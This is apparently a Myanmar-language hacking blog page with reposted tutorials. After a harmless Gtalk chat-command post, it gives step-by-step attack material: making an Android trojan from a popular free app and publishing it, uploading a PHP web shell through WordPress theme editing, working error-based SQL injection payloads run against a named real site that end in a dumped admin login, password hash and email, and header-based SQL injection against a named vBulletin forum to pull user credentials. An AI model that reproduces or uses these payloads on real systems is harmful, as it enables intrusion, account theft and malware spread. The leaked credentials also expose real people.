အဲဒီအခါ က်ရင္ သင္က yes လုပ္လိုက္ရုံေပါ့။ သင္ဖန္တီးခဲ့တဲ့ နာမည္ေတြနဲ႔ပဲလာေပၚပါလိမ့္မယ္။ အခုျပထားတာက နမူနာပံုေလးပါ။ ၿပီးရင္ေတာ့ သင့္ Gtalk ထဲမွာ အဲဒီ ဖန္တီးခဲ့တဲ့ နာမည္ေလးက အေရာင္ေလးလင္းေနပါလိမ့္မယ္။ အဲဒီေနာက္မွာေတာ့ သင္ဖိတ္ေခၚခ်င္တဲ့သူေတြကို ဖိတ္ေခၚႏိုင္ပါၿပီ။ အဲလိုဖိတ္ေခၚဖို႔အတြက္လည္း သင္က အခုေပးထားတဲ့ ပံုစံေတြအတိုင္းပဲ ရိုက္ထည့္ရပါလိမ့္မယ္။ /invite name@gmail.com က သင္ ဖိတ္ေခၚခ်င္တဲ့သူအတြက္ပါ။ /list ကေတာ့ သင္နဲ႔အတူ ဘယ္ႏွစ္ေယာက္ရွိလဲဆိုတာ ၾကည့္တာေပါ့။ ျပန္ထြက္ခ်င္ရင္ေတာ့ /exit ရိုက္လို႔လည္းရပါတယ္။ သင္ကလည္း ထြက္သြားၿပီ သူလည္းထြက္သြားၿပီ ေနာက္ေန႔ ေတြ႕ ၾကတဲ့အခါမွာေတာ့ ျပန္လည္ၿပီးေတာ့ /invite name@gmail.com ကို ျပန္လည္ရိုက္ၿပီးေတာ့ ေခၚႏိုင္ပါတယ္။ အဆင္ေျပၾကပါေစ။ ေအာက္မွာေပးထားထာကေတာ့ မူရင္းဆိုဒ္က ရိုက္ပံုရိုက္နည္းေတြပါ။

/leave Leave this chat room. You can rejoin by sending another message to the room. If the room is invite-only, you may need to be re-invited.
/list See who is in the chat room.
/alias newalias Change what name you show up as in the room.
/inviteonly Toggle whether this room is invite only.
/invite someemail Invite someone to the room.
/me someaction Tell the room what you’re up to.
If you type /me is rolling his eyes, everyone sees [youralias] is rolling his eyes.
credit:zawhlainghtun
ref:MHU
Read More ->>

[#][#][#] BHG မွ r00tcreat0r ၏ Buffero Overflow စာအုပ္ေလးပါ ~~~~~





Download >>> http://www.mediafire...fbkdwqbc53khoav

copy from MHU
Read More ->>

၀ိကိလိခ္ ၏ အတြင္းေရးမ်ား ( အပိုင္း ၁ မွ ၇ ) ထိ


၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို Giacomo က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို ဘာသာၿပန္ၿပီး တင္ေပးဖို႔ဆိုတာ ေတာ္ေတာ္ အားထည့္မွ ရတဲ႔ အလုပ္တစ္ခုပါ ... အခန္း ( ၂၁ ) ခန္းရွိတာ ခုက ( ၁ ) ကေန (၇ ) ထိပါ အခန္း ( ၈ ) ေတာ႔ ၿပီးေနၿပီလို႔ ေၿပာပါတယ္ ။ တင္ထားတာေတာ႔ မေတြ႕မိေသးဘူး... စိတ္၀င္စားဖို႔လည္း ေကာင္းသလို Internet Security နဲ႔ ပက္သက္ၿပီး ကမာကို ကိုင္လွုပ္ခဲ႔တဲ႔ လူေတြ ၿဖစ္လို႔ ပိုၿပီး စိတ္၀င္စားဖို႔ ေကာင္းပါတယ္

Download

http://www.mediafire.com/?y34ckt9u6hvujyq
 
ref:MHU 
Read More ->>

Sunday, August 26, 2012

Creating Andriod Trojan in 5 steps


Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။ Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့ ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္ Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္ :D
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။ စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္ ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ ထြက္လာတာ :D
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။ ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့ original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools ေတြနဲ့ေျပာင္းလို့ရပါတယ္။
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို သံုးသြားပါတယ္။
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္ run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။ (ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို :D )
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။ လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ :D
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့ ၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။

post by  Fortran
copy from Ghostarea.net
Read More ->>

..:: How to upload shell via Wordpress ::..[2 methods]



Wordpress ထဲကို ကိုယ္ရထားတဲ႔ username / password နဲ႔ login ၀င္ပါ...Dashboard ကိုေရာက္ပါလိမ္႔မယ္...ဘယ္ဘက္နားက appearance ကိုႏွိပ္ပါ...editor ကိုဆက္ႏွိပ္ပါ...Select theme to edit ဆိုျပီး ဒီလိုမ်ိဳးေလးျမင္ရပါလိမ္႔မယ္...ၾကိဳက္ႏွစ္သက္ရာ theme ကုိထားလိုက္ပါ...ကၽြန္ေတာ္ကေတာ႔ url ေခၚရ လြယ္ကူရွင္းလင္းေအာင္ twentyten ကိုပဲထားလိုက္ပါတယ္...select ကို ႏွိပ္ပါ...ပံုေတာ႔နည္းနည္းေသးတယ္....သည္းခံၾကည္႔ဗ်ာ....


 ျပီးရင္ ညာဘက္ျခမ္းနားက 404.php / sidebar.php / page.php စသည္ျဖင္႔ php ေတြအမ်ားၾကီး ရွိပါတယ္...ၾကိဳက္ႏွစ္သက္ရာ php တစ္ခုကို click လိုက္ပါ...edit box ထဲမွာ က်လာတဲ႔ သူ႔ရဲ႔ source code ကို shell ရဲ႔ source code နဲ႔လဲျပီး update ကို ႏွိပ္လိုက္ပါ...wordpress ကို shell တင္ျခင္း လုပ္ငန္းျပီးဆံုးပါျပီ....

shell url ကိုေခၚပါမယ္...သူ႔ path က ဒီလိုပါ...

www.site.com/wp-content/themes/themename/shellname.php


ကဲ...shell ၀င္သြားပါျပီဗ်ာ...ဒါပါပဲ...ေနာက္နည္းေတြလည္း ရွိေသးတယ္ဗ်...ဒါေပမယ္႔ ဒါကေတာ႔ အေသခ်ာဆံုးနည္းပဲ...


ေနာက္တစ္နည္း....
ဒီနည္းကို တို႔အစ္ကိုၾကီးတုတ္ေကာက္ ျပထားတာပါ...

http://www.site.com/...eme-install.php ဆိုတဲ႔အဲ path ကိုသြားပါ... upload option ေတြ႔ပါလိမ္႔မယ္...ႏွိပ္ျပီးေတာ႔ ေတြ႔တဲ႔ browse ကေန shell တင္ပါမယ္....






ဒီမွာ မွတ္ထားရမွာက shell ကိုဒီအတိုင္း .php အေနနဲ႔ တင္လို႔မရပါဘူး.... .zip နဲ႔တင္မွရပါမယ္...ဒီေတာ႔ ကိုယ္တို႔ shell က ccc.php ဆိုပါစို႔...... .zip နဲ႔ ခ်ံဳ႔လိုက္ပါမယ္..... ccc.zip ေပါ႔.... အဲဒီ ccc.zip ကို upload လုပ္ပါ.... .rar မဟုတ္ဘူးေနာ္... zip ... ေသခ်ာေျပာတယ္ေနာ္... .zip လို႔....

တင္လိုက္တာရသြားရင္ ဒီလိုမ်ိဳးစာျပပါလိမ္႔မယ္....


Unpacking the package
Installing the theme
Theme installed successfully.

ဒါဆို shell ရသြားပါျပီ... 
မ်ားမ်ားမေျပာဘူး....သူ႔ shell path က ဒီလိုမ်ိဳးေလးျဖစ္ပါမယ္...မေမ႔ခ်င္ရင္ က်က္ထား... 

www.site.com/wp-content/themes/ccc/ccc.php

ကၽြန္ေတာ္က 404.zip ကိုတင္လိုက္တယ္....ဒီေတာ႔ ကၽြန္ေတာ္႔ shell path က ဒီလိုျဖစ္သြားတာေပါ႔ဗ်ာ.... 
http://www.divinginsurance.org/wp-content/themes/404/404.php



copy from MHU
Read More ->>

[Tut]Error-Based SQL Injection[/Tut]



Error-Based SQL Injection

Content
1.Introduction
2.About
3.Version စစ္မယ္
4.Database စစ္မယ္
5.Table name ရွာမယ္
6.Column name ရွာမယ္
7.Harvestin Data
8.Conclusion

1.Introduction
ဒီ...Error-based SQL injection အေၾကာင္းကုိဘယ္သူမွစတာမေတြ.ေသးလုိ. ဒီ Thread ေလးကုိဖြင့္ေပးလုိက္ပါတယ္...
မွားတာေတြရွိေနရင္လည္း ၀င္းျပီးေထာက္ျပေဆြေႏြးေပးၾကပါ... Posted Image
အရင္ဆုံး SQL Injection အေၾကာင္းကုိနဲနဲေလေဖာပါရေစ Posted Image

SQL Injection ကုိအေျခခံအားျဖင့္ 4မ်ိဳးခဲြျခားလုိ.ရပါတယ္... တခ်ဳိ.ကလည္းသုံးမ်ဳိးလုိ.ေျပာတယ္ ...
1.Blind Based (Also called Boolean)
2.Union Based (အသုံးမ်ားတယ္)
3.Error Based (အခုေျပာမွာ)
4.Double Query (ေနာက္ေျပာမွာ Posted Image)

နံပါတ္ ၁ ျဖစ္တဲ့ Blind ကေတာ္ေတာ္ပဲခက္ပါတယ္... Guessing Skill နဲ. Experience အမ်ားၾကီးလုိပါတယ္ ...လက္ေရွာင္တာမ်ားတယ္(အေနာ္လည္းတစ္ခါမွ ေအာင္ေအာင္ျမင္္ျမင္မထုိးဘူးေသးဘူး Posted Image)
Havij Free version မွာလည္းသုံးမရဘူး... Pro version ၀ယ္ႏိုင္ရင္ေကာင္းမယ္ (ကုိေဘာ့စ္ကုိပူဆာ ၾကပါ Posted Image)

နံပါတ္ ၂ Union ...ကေတာ့အားလုံးလည္းသိျပီးသား ...နာမည္ၾကီးမင္းသား... တစ္တစ္ခါခါ ... Firewall ခံေနတာကလြဲရင္ အသုံးမ်ားတယ္...

နံပါတ္ ၃ Error Based ...အရမ္းကုိေကာင္းတဲ့ Method ပါ... Union အလုပ္မလုပ္ေတာ့ရင္ သူကကယ္တင္ရွင္ပဲ...

နံပါတ္ ၄ Double Q ...သူက Error ရဲ.အဆက္ Query structure ကနာမည္နဲ.လုိက္ေအာင္ေတာ္ေတာ္ရွည္တယ္... သူ.ကုိသုံးရင္ "Bad Request"ဆုိျပီးျပတက္တယ္... သိပ္ေတာ့ၾကိဳက္ဘူး.....

ဒါေတြကအသုံးမ်ားတဲဟာေတြ ... တစ္ျခားအသုံးနည္းတဲ့ MS တုိ. Oracle တုိ. Header Based တုိ.တစ္ပုံၾကီးရွိေသးတယ္...
ကဲကဲေလေဖာတာရပ္ျပီး ....စၾကမယ္ဗ်ာ....

2.About
Error-Based ရဲ. Definition

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

သူ.ကိုဘယ္လုိအေျခအေနေတြမွာသုံးႏိုင္လဲ ....?
သူ.ကုိ Union သုံးေနရင္နဲ. ေအာက္က Error မ်ဳိးတစ္ခုခုေတြ.လာျပီဆုိသုံးႏုိင္ပါတယ္...

1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604

ကုိယ္က Union မသုံးခ်င္ဘူးဆုိလည္းသူ.ကိုတန္းသုံးခ်င္လည္းရတယ္...
Demo အေနနဲ.ဒီ site ကုိသုံးျပပါမယ္...
http://www.elansystems.co.za/product-item.php?product_items_id=11
 
3.Version စစ္မယ္

အရင္ဆုံး Version စစ္ဖုို.သုံးရမယ့္ Query က

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'
 
4.Database စစ္မယ္

DB Name ကုိသိခ်င္ရင္ သုံးရမယ့္ Query က
 
and (select 1 from (select count(*),concat((select(select concat(cast(database() as
 char),0x7e)) from information_schema.tables where table_schema=database() limit 0,
1),floor(rand(0)*2))x from information_schema.tables group by x)a) 
 
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
 
http://www.elansystems.co.za/product-item.php?product_items_id=11 [color=#ffd700]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/color]
 
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry 'elansyst_elan~1' for key 'group_key'
Notepad ေလးဖြင့္ျပီး အသာေလးတုိ.ထားလုိက္ ....
ကဲဘယ္လုိလဲ လြယ္လြယ္ေလးပဲမဟုတ္လား... Posted Image

5.Table name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
သတိ limit Function ကုိသုံထားျပီး Table name ေတြကိုတစ္ခုခ်င္း... 1 တုိးျပီးႏုွိက္ထုတ္ပါမယ္....
limit 0,1 ဆုိတဲ့ေနရာမွာ 1,1 .... 2,1 ....စသျဖင့္ Table name ေတြတစ္ခုခ်င္းၾကည့္ရမွာပါ...

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'dealer_tbl~1' for key 'group_key'
ဆက္ရွာပါ.. ကုိယ္စိတ္၀င္စားတာေတြ.ရင္ရပ္ေပါ့...
ဒီေနရာမွာ Table 'wp_users' ကစိတ္၀င္စားဖုိ. တစ္အားေကာင္းေနျပီ Posted Image
ဒီေတာ့ users ထဲက Columns ေတြကို ႏုွိက္ထုတ္ပါ့မယ္....

6. Column name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ဒီေနရာမွာ ကုိယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit
2.table_name ကုိHexခံမယ္ (http://www.swingnote...s/texttohex.php)
ဒီလုိနဲ. limit ကုိ ၁ စီတုိးျပီး ... Column name ေတြရပါလိမ့္မယ္...


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'ID~1' for key 'group_key'

cOlumn Name - user_name , user_password , user-email ကိုစိတ္၀င္စားတယ္ဟုတ္?
ok? .....

7.Harvesting Data
ကုိယ့္စိတ္၀င္စားမယ့္ Column name ေတြလည္းရျပီဆုိရင္ Extract လုပ္ပါေတာ့မယ္...
သုံရမယ္ Query ပုံစံက
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ကိုယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit function (count 1 by 1)
2.Databasename (ေစာေစာကတုိ.ထားတဲ့ name ကုိထည့္)
3.TableName (အခုေရာက္ေနတဲ့ table ေပ့ါ)
4.COLUMNNAME (ကို္ယ့္စိတ္၀င္စားတဲ့ COLUMN ေပါ့)

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'elan_admin~1' for key 'group_key'

ေနာက္ဆုံးရမယ္အေျဖကုိ ကိုယ့္ပါသာကုိယ္ပဲဆက္ျပီးလုပ္ၾကည့္ပါေတာ့
Quote
elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za

8.Conclusion
ဒီေလာက္ဆုိ လြယ္လြယ္ကူကူပဲသေဘာေပါက္မိလိမ့္မယ္ထင္ပါတယ္... ဒီနည္းကအသုံးလည္း၀င္ျပီးလြယ္လည္းလြယ္ကူပါတယ္...
အားနည္းခ်က္ေတြက
၁.Query ရွည္လုိ.အမွားအယြင္းရွိႏုိင္တယ္...
၂.Union မွာ Firewall နဲ.တုိးျပီးဆုိ WAF bypass လုပ္လုိ.ေကာင္းတယ္.. Error ဆုိစိတ္ညစ္ဖုိ.ေကာင္း (အေနာ္လည္းအခုထိလုပ္တက္ေသးဘူး ..လုပ္တက္တဲ့သူမ်ားေအာက္မွာတစ္ခါတည္းေျပာျပၾကပါ ... )
၃.နည္းနည္းလက္၀င္တယ္....

copy from http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/





 
Read More ->>

[TUT]Vbulletin Forum Hacking with Header-Based SQL injection[TUT]




Injecting Vbulletin Forum
******************
/Content\
****************************
$1.Intro
$2.Tutorial
$3.Conclusion

$1.Intro

Quote
Category : Forum Group Injection
Method : Header-Based SQL injection
Original Exploit :http://www.exploit-i...-sql-injection- vulnerability by D4rkB1t
Software :Vbulletin
Dork :inurl:"search.php?search_type=1"
Vulnerable Version : 4.0.x to 4.1.2


(Ques? ကုိနတ္ဆုိးေရ... အခုေျပာမယ့္ အေၾကာင္းအရာေလးကုိ နဲနဲေလာက္ရွင္းျပပါဦး)
(Ans : ဟုတ္ကဲ့ပါ... ရွင္းပါတယ္.. Vbulletin Forum ေတြကုိ SQL injection ေပါက္တဲ့အေၾကာင္းေလးပါတယ္... ကန္.သတ္ခ်က္ေလးေတြရွိပါတယ္....အေပၚမွာေရထားတဲ့အတုိင္း.... version က 4.0.x ကေန 4.1.2 အတြင္းပဲရမွာ vulnerable ျဖစ္ႏွုန္းက ... နဲနဲနည္းပါတယ္... 50% ၀န္းက်င္ေလာက္ေတာ့ရွိပါတယ္... vbulletin ဆုိေတာ့ Admin login ရွာရတာလြယ္ပါတယ္.... ရလာတဲ့ hash ကုိ ျဖည္ဖုိ.ခက္တာပါ)

MRTV-4 ကေတြ.ဆုံေမးျမန္းတဲ့ စတုိင္ဖမ္းထားတယ္.... Posted Image Posted Image

(Ques? ဟင္..ခင္ဗ်ားဟာကလည္း... version ကလည္းေအာက္ေသး.... ျဖစ္ႏုိ္င္ေျခကလည္းနည္းေသး... hashed ကလည္းေျဖမရေတာ့... ဘာသြားလုပ္ေတာ့မွာတုန္း...)
(Ans: နည္းပညာေလဗ် နည္းပညာ...
နည္းပညာလုိက္စားသူတုိင္းက တစ္ခုခု...အသစ္သိရတုိင္း...ထမင္းေမ့ဟင္းေမ့ေလ့လာတက္ၾကတယ္... ခင္ဗ်ားနည္းပညာကုိမသိခ်င္ဘူးလား..?)


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$2.Tutorial
ေတာ္ပါျပီ... ေလပန္းေနတာရပ္ျပီး... စပါေတာ့မယ္... ဒန္တန္.တန္..... Posted Image
အရင္ဆုံး Live Http headers မရွိသူမ်ား.... အျမန္ဆုံးသြင္းလုိက္ၾကပါ....
goto : broswer >> Alt+T >> A >> Search for addons

ပုံမွန္ဆုိရင္ ... google မွာ dork ထည့္ရွာျပီး... Forum ၀င္ျပီး... ေဖာက္ရမွာပါတယ္... အခုေတာ့ ကြ်န္ေတာ့္ demo ေလးနဲ.ပဲ ...လုပ္ပါေတာ့... Posted Image
demo site:
Quote
www.myanmarengineer.org
ကုိေဘာ့စိက... အၾကားအျမင္ရေနလားမတိဘူး.... :P
Forum rules ကျမန္မာ website မ်ားမလုပ္ပါနဲ.ဆုိေတာ့... အခုဟာက ... ခဏေလးပဲစမ္းၾကည့္မွာပါ... (Rule လြတ္တယ္ေနာ္ :))
password ရလည္းဘာမွလုပ္လုိ.မရပါဘူး ... (သိတဲ့အတုိင္းပဲ.. Vbulletin hash အေၾကာင္းကုိေလ)

အဲဒီ့ေတာ့ vul ျဖစ္တဲ့ေနရာ .... Community ထဲက ... Groups ေနရာမွာပါ....
site ရဲ. ညာဘက္ေထာင့္ဆုံး.... အေပၚနားေလးမွာ ... Advanced Search button ေလးကုိ ႏိွပ္ပါ
ေအာက္ကပုံေလးထဲကုိေရာက္သြားလိမ့္မယ္...


လုပ္ရမယ့္အဆင့္ဆင့္က ... forum မွာ member ၀င္... အုပ္စုထဲကုိသြား...ကုိယ့္ဘာသာ ...အုပ္စုတစ္ခုခုကုိ create လုပ္ ...
ဒါမွမဟုတ္လဲ ... ရွိျပီးသား...တစ္ခုခုကုိ ခဏမွတ္ထားလုိက္ေပါ့...

ဒီအဆင့္ေတြျပီးသြားရင္ ... ေစာေစာက Advanced Search ကုိျပန္သြားပါ ...
ကုိယ္မွတ္ထားတဲ့ Group နာမည္ကုိ search box ထဲထည့္ပါ....

ေစာေစာ Install လုပ္ထားတဲ့ ... Live Http headers add-on ကိုဖြင့္ထားပါ ...
ျပီးရင္ search now ကုိႏိွပ္ပါ...
ေအာက္ကပုံကုိၾကည့္ၾကပါ...







ပုံမွာ highlight လုပ္ထားတဲ့ ... စာသားေလးကုိေတြ.ေအာင္ရွာပါ ...
ျပီးရင္... click လုပ္... ေအာက္က replay button ကုိႏိွပ္....
http://i.imgur.com/lBdsZ.png
အခုလုိ ျမင္ရပါလိမ့္မယ္..












cotent box ထဲက.... စာေတြထဲမွာ ေနာက္ဆုံးက .. Id= ဆုိတာကုိေတြ.တယ္ဟုတ္... အဲဒီ့ မွာ SQL query ေတြပုိ.မွာ...
ေအာက္ကဟာေလးကုိ cp/paste လုပ္ျပီး.... replay button ကုိႏွိပ္ပါ...

&cat[0]=1) union select version#

ဒါဆုိအခုလုိ vesion ျမင္ရမယ္....



ေနာက္ဆုံးအဆင့္ ... usr name ေတြ password ေတြ လုိခ်င္ရင္ေအာက္က query ကုိေစာေစာကအတုိင္းပုိ.လုိက္ေပါ့....

&cat[0]=1 union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,usergroupid) from user where usergroupid=6#
ေအာက္မွာ ၾကည့္ၾကပါ...



ဒီေလာက္ဆုိ... သေဘာေပါက္ေလာက္ပါတယ္... ေနာ္...
အားနည္းခ်က္.... Human Image Verification ... ရိွေနရင္...မရပါ....
ပံုမ်ားမျမင္ရလွ်င္ကလစ္လုပ္ပါ

copy from mhu
Thank to D3vilM4yCry


Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology